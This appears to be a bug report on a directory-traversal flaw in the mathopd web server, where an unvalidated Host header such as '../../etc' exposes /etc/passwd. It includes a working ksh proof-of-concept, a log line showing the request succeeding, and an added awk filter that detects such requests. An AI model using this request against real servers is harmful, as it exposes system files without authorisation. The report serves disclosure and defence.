This is quite easy to reproduce with the attached ksh script. The HTTP Host header is not checked against DNS to see whether it matches the socket address; that would be expensive. Checking Host against a glob would be faster.
If the config could match /** or **..** in domains then it would be okay, but it did not seem to match. "**" should match anything, including '/'. However, Host is not globbed. The only fix is to have multiple Virtual sections, one for each document root, with Host entries for each HTTP Host; i.e. you must use the exact HTTP Host. Do not use Location /var/www/*, as this matches any arbitrary HTTP Host. In the example you could spam users in /etc/passwd and say bad things about admin.

/var/log/mathopd/access.log:
127.0.0.1 - Sat Jul 28 09:29:39 2012 ../../etc 80 GET /passwd - HTTP/1.1 200 60 - -

#!/usr/bin/ksh
# Superfluous carriage return may be required
my_echo() { printf "%b\r\n" "$*"; }
test -n "$2" || set -- ../../etc /passwd
exec 3<>/dev/tcp/localhost/80
{
    my_echo "GET $2 HTTP/1.1"
    my_echo "Host: $1"
    my_echo "Connection: close"
    my_echo ""
} >&3
while read -r LINE
do
    printf "%s\n" "$LINE"
done <&3
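
One way to find requests like the one logged above in an existing access log, as an added example (not part of the original report or of mathopd): a shell/awk filter that flags entries whose Host field is not a plain hostname. The field position (HOST_FIELD=8) is an assumption taken from the single log line on this page, "-" as the marker for a missing Host is also an assumption, and the function names are hypothetical.

```shell
#!/bin/sh
# Added example: flag access-log entries whose Host field is not a plain hostname.
# Assumption: field layout as in the one log line on this page,
#   client - Dow Mon DD HH:MM:SS YYYY host port method uri ...
# The log format is configurable, so adjust HOST_FIELD for the local format.
HOST_FIELD=8

suspicious_hosts() {
    # stdin: log lines; stdout: "line-number<TAB>host<TAB>uri" per suspicious entry
    awk -v hf="$HOST_FIELD" '
    function bad_host(h,    n, labels, i) {
        if (h == "-") return 0               # assumed marker for "no Host sent"
        sub(/:[0-9]+$/, "", h)               # drop an optional :port
        sub(/\.$/, "", h)                    # allow one trailing dot (FQDN form)
        if (length(h) == 0 || length(h) > 253) return 1
        if (h ~ /[^A-Za-z0-9.-]/) return 1   # "/", "\", "%", whitespace, ...
        n = split(h, labels, ".")
        for (i = 1; i <= n; i++) {
            if (labels[i] == "") return 1    # empty label, e.g. ".."
            if (labels[i] ~ /^-|-$/) return 1
        }
        return 0
    }
    NF >= hf + 3 && bad_host($hf) { printf "%d\t%s\t%s\n", NR, $hf, $(hf + 3) }
    '
}

sample_log() {
    # First line is the entry quoted on this page; the rest are constructed.
    cat <<'EOF'
127.0.0.1 - Sat Jul 28 09:29:39 2012 ../../etc 80 GET /passwd - HTTP/1.1 200 60 - -
127.0.0.1 - Sat Jul 28 09:30:02 2012 www.example.com 80 GET /index.html - HTTP/1.1 200 512 - -
127.0.0.1 - Sat Jul 28 09:30:05 2012 www.example.com:80 80 GET / - HTTP/1.1 200 512 - -
127.0.0.1 - Sat Jul 28 09:30:09 2012 - 80 GET / - HTTP/1.0 200 512 - -
EOF
}

sample_log | suspicious_hosts
```

Run against a real log with `suspicious_hosts < /var/log/mathopd/access.log`. IPv6 literals in Host are also flagged by this filter, since brackets and colons are outside the allowed character set.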